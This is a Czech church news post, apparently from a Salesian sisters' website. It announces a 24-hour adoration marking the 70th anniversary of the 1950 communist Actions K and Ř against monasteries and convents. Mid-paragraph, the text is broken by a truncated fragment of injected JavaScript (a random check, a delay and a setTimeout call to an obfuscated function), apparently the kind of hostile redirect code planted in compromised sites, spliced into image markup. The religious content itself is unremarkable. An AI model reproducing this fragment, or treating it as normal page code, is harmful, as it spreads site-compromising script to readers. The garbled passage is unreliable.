Adorace k “sedmdesátce”

V noci ze 13. na 14. dubna roku 1950 se konala akce K (násilné rušení mužských klášterů v socialistickém Československu) a na podzim akce Ř (to samé, ale týkalo se to ženských řeholí). Letos tedy slavíme 70. výročí od tohoto nuceného vyhnanství. Při této příležitosti chceme, my řeholnice (a řeholníci) v Česku i na Slovensku, poděkovat za dar svobody, poděkovat za všechno dobré, co z utrpení našich sester a bratří v době totality vzklíčilo. Učiníme tak 24 hodinovou adorací – každá komunita ve svém klášteře či řeholním domě – a to už dnes od 19 hodin do úterního večera 19 hodin. andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-393957_1280_180921-172253_pla-300×169.jpg” alt=”” width=”300″ height=”169″>Každá komunita se připojí na libovolnou dobu v libovolné hodině, rozpis je však připraven tak, aby nepřetržitě bylo 24 hodin chváleno Pánovo jméno. Adorace dnes bude začínat společným zvoněním zvonů z klášterních kaplí a domů. I naše komunity FMA se připojují k této iniciativě. Další bohoslužby, výstavy a vzpomínkové akce jsou díky epidemii koronaviru přesunuty na podzim. Zveme vás, pokud chcete, připojit se doma ve svých domácnostech k tiché modlitbě za všechny, kteří před 70 lety trpěli a z jejichž plodů my dnes můžeme žít. Stejně tak za to, aby i dnešní řeholníci a řeholnice naplňovali své poslání správným způsobem a přispívali ke spáse lidí a k Boží oslavě.